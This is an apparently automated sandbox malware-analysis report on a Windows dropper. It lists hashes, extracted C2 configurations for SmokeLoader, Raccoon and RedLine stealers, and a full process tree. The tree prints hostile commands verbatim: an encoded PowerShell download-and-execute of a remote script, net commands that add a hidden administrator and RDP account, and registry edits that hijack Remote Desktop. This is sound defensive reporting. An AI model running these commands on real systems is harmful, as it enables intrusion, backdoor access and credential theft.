Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    12-10-2021 12:23

General

  • Target

    66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe

  • Size

    175KB

  • MD5

    b6ccbe38498d3243118d076fe793989e

  • SHA1

    d52cccb6054172e93c752de847eb15ca30545068

  • SHA256

    66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17

  • SHA512

    6b6f89a2245e64385ca5612f592460c1e66b03a708d98f8dc08f7034167e1141c29d4b843e5fbfbc5e437b112d1e30797dfe8c504fc5ef8fafe71cb6f5a01139

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Version

1.8.2

Botnet

8d179b9e611eee525425544ee8c6d77360ab7cd9

Attributes
  • url4cnc

    http://teletop.top/agrybirdsgamerept

    http://teleta.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

159

C2

190.2.136.29:3279

Extracted

Family

raccoon

Version

1.8.2

Botnet

27d80aa27e80cd2ef63c638e2752e24242d1b37c

Attributes
  • url4cnc

    http://telemirror.top/ararius809b

    http://tgmirror.top/ararius809b

    http://telegatt.top/ararius809b

    http://telegka.top/ararius809b

    http://telegin.top/ararius809b

    https://t.me/ararius809b

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

w1

C2

109.234.34.165:12323

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 24 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe
    "C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3704
    • C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe
      "C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:4364
  • C:\Users\Admin\AppData\Local\Temp\F34A.exe
    C:\Users\Admin\AppData\Local\Temp\F34A.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:772
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1008
  • C:\Users\Admin\AppData\Local\Temp\FDCA.exe
    C:\Users\Admin\AppData\Local\Temp\FDCA.exe
    1⤵
    • Executes dropped EXE
    PID:4292
  • C:\Users\Admin\AppData\Local\Temp\D3D.exe
    C:\Users\Admin\AppData\Local\Temp\D3D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4972
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mvqhkszm\mvqhkszm.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2820
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES391D.tmp" "c:\Users\Admin\AppData\Local\Temp\mvqhkszm\CSCD76DBC5193664ECEA183C9CC9464DAA6.TMP"
          4⤵
            PID:3412
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2508
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
            PID:1048
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            3⤵
              PID:2072
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              3⤵
              • Modifies registry key
              PID:2136
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              3⤵
                PID:4584
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                3⤵
                  PID:3964
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                    4⤵
                      PID:3480
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                    3⤵
                      PID:1236
                      • C:\Windows\system32\cmd.exe
                        cmd /c net start rdpdr
                        4⤵
                          PID:1592
                          • C:\Windows\system32\net.exe
                            net start rdpdr
                            5⤵
                              PID:1264
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 start rdpdr
                                6⤵
                                  PID:2360
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                            3⤵
                              PID:2700
                              • C:\Windows\system32\cmd.exe
                                cmd /c net start TermService
                                4⤵
                                  PID:2724
                                  • C:\Windows\system32\net.exe
                                    net start TermService
                                    5⤵
                                      PID:4440
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 start TermService
                                        6⤵
                                          PID:4436
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                    3⤵
                                      PID:4788
                                    • C:\Windows\system32\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                      3⤵
                                        PID:4944
                                  • C:\Users\Admin\AppData\Local\Temp\1358.exe
                                    C:\Users\Admin\AppData\Local\Temp\1358.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:376
                                  • C:\Users\Admin\AppData\Local\Temp\19B2.exe
                                    C:\Users\Admin\AppData\Local\Temp\19B2.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1852
                                  • C:\Users\Admin\AppData\Local\Temp\29E0.exe
                                    C:\Users\Admin\AppData\Local\Temp\29E0.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:4276
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                      2⤵
                                      • Drops file in System32 directory
                                      • Drops file in Windows directory
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:2504
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2rpuo5xa\2rpuo5xa.cmdline"
                                        3⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2728
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6108.tmp" "c:\Users\Admin\AppData\Local\Temp\2rpuo5xa\CSCCADD0BA021BA460E81240DED36F57D6.TMP"
                                          4⤵
                                            PID:520
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                          3⤵
                                            PID:3200
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                            3⤵
                                              PID:5028
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                              3⤵
                                                PID:4776
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                3⤵
                                                  PID:4960
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                  3⤵
                                                  • Modifies registry key
                                                  PID:376
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                  3⤵
                                                    PID:1640
                                                  • C:\Windows\SysWOW64\net.exe
                                                    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                    3⤵
                                                      PID:4352
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                        4⤵
                                                          PID:4480
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                        3⤵
                                                          PID:4348
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c net start rdpdr
                                                            4⤵
                                                              PID:3644
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net start rdpdr
                                                                5⤵
                                                                  PID:4628
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 start rdpdr
                                                                    6⤵
                                                                      PID:4784
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                3⤵
                                                                  PID:2748
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c net start TermService
                                                                    4⤵
                                                                      PID:2184
                                                                      • C:\Windows\SysWOW64\net.exe
                                                                        net start TermService
                                                                        5⤵
                                                                          PID:372
                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                            C:\Windows\system32\net1 start TermService
                                                                            6⤵
                                                                              PID:2096
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                                        3⤵
                                                                          PID:4592
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                                          3⤵
                                                                            PID:1760
                                                                      • C:\Users\Admin\AppData\Local\Temp\2FFB.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\2FFB.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4444
                                                                        • C:\Users\Admin\AppData\Local\Temp\2FFB.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\2FFB.exe
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5068
                                                                      • C:\Windows\System32\cmd.exe
                                                                        cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                        1⤵
                                                                          PID:4788
                                                                          • C:\Windows\system32\net.exe
                                                                            net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                            2⤵
                                                                              PID:2008
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
                                                                                3⤵
                                                                                  PID:376
                                                                            • C:\Windows\System32\cmd.exe
                                                                              cmd /C net.exe user WgaUtilAcc HyHMEASe /add
                                                                              1⤵
                                                                                PID:3772
                                                                                • C:\Windows\system32\net.exe
                                                                                  net.exe user WgaUtilAcc HyHMEASe /add
                                                                                  2⤵
                                                                                    PID:368
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user WgaUtilAcc HyHMEASe /add
                                                                                      3⤵
                                                                                        PID:1268
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                    1⤵
                                                                                      PID:2176
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                        2⤵
                                                                                          PID:964
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                            3⤵
                                                                                              PID:4656
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                          1⤵
                                                                                            PID:4140
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                              2⤵
                                                                                                PID:1484
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                  3⤵
                                                                                                    PID:1704
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                1⤵
                                                                                                  PID:1176
                                                                                                  • C:\Windows\system32\net.exe
                                                                                                    net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                    2⤵
                                                                                                      PID:1900
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                        3⤵
                                                                                                          PID:4348
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      cmd /C net.exe user WgaUtilAcc HyHMEASe
                                                                                                      1⤵
                                                                                                        PID:4532
                                                                                                        • C:\Windows\system32\net.exe
                                                                                                          net.exe user WgaUtilAcc HyHMEASe
                                                                                                          2⤵
                                                                                                            PID:820
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 user WgaUtilAcc HyHMEASe
                                                                                                              3⤵
                                                                                                                PID:2096
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            cmd.exe /C wmic path win32_VideoController get name
                                                                                                            1⤵
                                                                                                              PID:1208
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic path win32_VideoController get name
                                                                                                                2⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:1264
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              cmd.exe /C wmic CPU get NAME
                                                                                                              1⤵
                                                                                                                PID:3812
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic CPU get NAME
                                                                                                                  2⤵
                                                                                                                    PID:672
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                  1⤵
                                                                                                                    PID:2008
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                      2⤵
                                                                                                                        PID:376
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                          3⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:2816

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2FFB.exe.log

                                                                                                                      MD5

                                                                                                                      41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                      SHA1

                                                                                                                      5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                      SHA256

                                                                                                                      df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                      SHA512

                                                                                                                      234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                      MD5

                                                                                                                      2cb3f528286df9feab019e0de2053b6a

                                                                                                                      SHA1

                                                                                                                      0d5835457f71fd6cdfa45e7280544142e35ad6fc

                                                                                                                      SHA256

                                                                                                                      bcdaef74a79cde95526e25c52de2623b0e2b2091a304e57db0cd7e640bb08943

                                                                                                                      SHA512

                                                                                                                      c466148cc9d282d02b5463c2ddd0d28c69a0e1715d4aae3bbf9874d39df6ffbc242f10be9d75b18c71d49626ae4f4bb6886f4955afced091e68590155a79e860

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                      MD5

                                                                                                                      9d43e21785cc3169068bf06afc6cf381

                                                                                                                      SHA1

                                                                                                                      4fa0be5efd37649253515426920dc13aef285221

                                                                                                                      SHA256

                                                                                                                      0d2978f868b8225004adf71ff7861290926c9d38cd02431f17b21b1e145e38f1

                                                                                                                      SHA512

                                                                                                                      08d056a8e6bb95e21270e9ac42d851124ffa5fbe6b3917558551e7726645bc8ebe288f999df33c4620d11a817e9d96bef597b47d4bee151727b0e308c17cb75b

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1358.exe

                                                                                                                      MD5

                                                                                                                      a19a2df690373a754da550eaa42a341e

                                                                                                                      SHA1

                                                                                                                      75ff4f812afbc30865aae903f5c9f1d43a94241f

                                                                                                                      SHA256

                                                                                                                      f2c3dc556b78c0d91c0ca97d844901cc67cb3f5bc4ee544ba21a2c3c44a59b7b

                                                                                                                      SHA512

                                                                                                                      e0bf200383d416144cdb8e9980fa80c246f060a37550a6f1cad22ce3e2d29ec9eef39baa61555ab82f884d8e6912d23f705233760e335940936a5e21dabef70d

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1358.exe

                                                                                                                      MD5

                                                                                                                      a19a2df690373a754da550eaa42a341e

                                                                                                                      SHA1

                                                                                                                      75ff4f812afbc30865aae903f5c9f1d43a94241f

                                                                                                                      SHA256

                                                                                                                      f2c3dc556b78c0d91c0ca97d844901cc67cb3f5bc4ee544ba21a2c3c44a59b7b

                                                                                                                      SHA512

                                                                                                                      e0bf200383d416144cdb8e9980fa80c246f060a37550a6f1cad22ce3e2d29ec9eef39baa61555ab82f884d8e6912d23f705233760e335940936a5e21dabef70d

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\19B2.exe

                                                                                                                      MD5

                                                                                                                      f5c4d463115dc020d5ec1756da0258a0

                                                                                                                      SHA1

                                                                                                                      b66eb6992d7c0191d1255ae0ada35b6403221425

                                                                                                                      SHA256

                                                                                                                      fa0bcd10cdc9df5fe9806e16a933d71d49c93fb6b21e75e2215bb728212b570e

                                                                                                                      SHA512

                                                                                                                      854bbe52abf339b75e68c20aef0b905fb29c4c2580a44b957b6d6b02889b78a44f6605a2e45f61f358b7b63d3530b61f6bad513f0672bcef06268d9ea1c55350

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\19B2.exe

                                                                                                                      MD5

                                                                                                                      f5c4d463115dc020d5ec1756da0258a0

                                                                                                                      SHA1

                                                                                                                      b66eb6992d7c0191d1255ae0ada35b6403221425

                                                                                                                      SHA256

                                                                                                                      fa0bcd10cdc9df5fe9806e16a933d71d49c93fb6b21e75e2215bb728212b570e

                                                                                                                      SHA512

                                                                                                                      854bbe52abf339b75e68c20aef0b905fb29c4c2580a44b957b6d6b02889b78a44f6605a2e45f61f358b7b63d3530b61f6bad513f0672bcef06268d9ea1c55350

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\29E0.exe

                                                                                                                      MD5

                                                                                                                      2686d02fd6a82432c2bbfccdf7f334de

                                                                                                                      SHA1

                                                                                                                      75c80a6877c6e0724d19de0f5149bed186760e27

                                                                                                                      SHA256

                                                                                                                      35270b20b568beb5f844e1b8c9bfe53498cfbac02633a9cb3ca5927a2cba4e4d

                                                                                                                      SHA512

                                                                                                                      22333918e2fed9e39c967313f77844b6bc4f3a2dbfe97223c08def7b80057b7c89f5b75460575172e99c11ee2b824c66e4417588a12ae6a314968c2a34d01698

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\29E0.exe

                                                                                                                      MD5

                                                                                                                      2686d02fd6a82432c2bbfccdf7f334de

                                                                                                                      SHA1

                                                                                                                      75c80a6877c6e0724d19de0f5149bed186760e27

                                                                                                                      SHA256

                                                                                                                      35270b20b568beb5f844e1b8c9bfe53498cfbac02633a9cb3ca5927a2cba4e4d

                                                                                                                      SHA512

                                                                                                                      22333918e2fed9e39c967313f77844b6bc4f3a2dbfe97223c08def7b80057b7c89f5b75460575172e99c11ee2b824c66e4417588a12ae6a314968c2a34d01698

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2FFB.exe

                                                                                                                      MD5

                                                                                                                      3de1b117e92c82530bb90a01b5d5d51e

                                                                                                                      SHA1

                                                                                                                      8aec1842e379c1c6d9be27e5f144f037fed18432

                                                                                                                      SHA256

                                                                                                                      789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

                                                                                                                      SHA512

                                                                                                                      ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2FFB.exe

                                                                                                                      MD5

                                                                                                                      3de1b117e92c82530bb90a01b5d5d51e

                                                                                                                      SHA1

                                                                                                                      8aec1842e379c1c6d9be27e5f144f037fed18432

                                                                                                                      SHA256

                                                                                                                      789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

                                                                                                                      SHA512

                                                                                                                      ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2FFB.exe

                                                                                                                      MD5

                                                                                                                      3de1b117e92c82530bb90a01b5d5d51e

                                                                                                                      SHA1

                                                                                                                      8aec1842e379c1c6d9be27e5f144f037fed18432

                                                                                                                      SHA256

                                                                                                                      789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

                                                                                                                      SHA512

                                                                                                                      ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2rpuo5xa\2rpuo5xa.dll

                                                                                                                      MD5

                                                                                                                      e4c0f63ddb40a0308a99cdcd52ed2c75

                                                                                                                      SHA1

                                                                                                                      7a16c5176a1c5e2697bf3fac7456149f8dbf8938

                                                                                                                      SHA256

                                                                                                                      a069c94d3c048ff5e5219ac18243874c92303f00fbbc22888ab30c32dcadace1

                                                                                                                      SHA512

                                                                                                                      b7455b4942aed7a202f909fea7c99de057ea6fb188f2abfd037798b29bc2b5cb5218c1261b77e9097d4f0ae6e2b6dac3ee20fc5228fa2c6979a9b1b4ed3dd2fc

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D3D.exe

                                                                                                                      MD5

                                                                                                                      fc239dd2dc52a4853c7be50c86367f7b

                                                                                                                      SHA1

                                                                                                                      f6c01c5da3f62a97f6d4427b626d366ad898d3b3

                                                                                                                      SHA256

                                                                                                                      e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b

                                                                                                                      SHA512

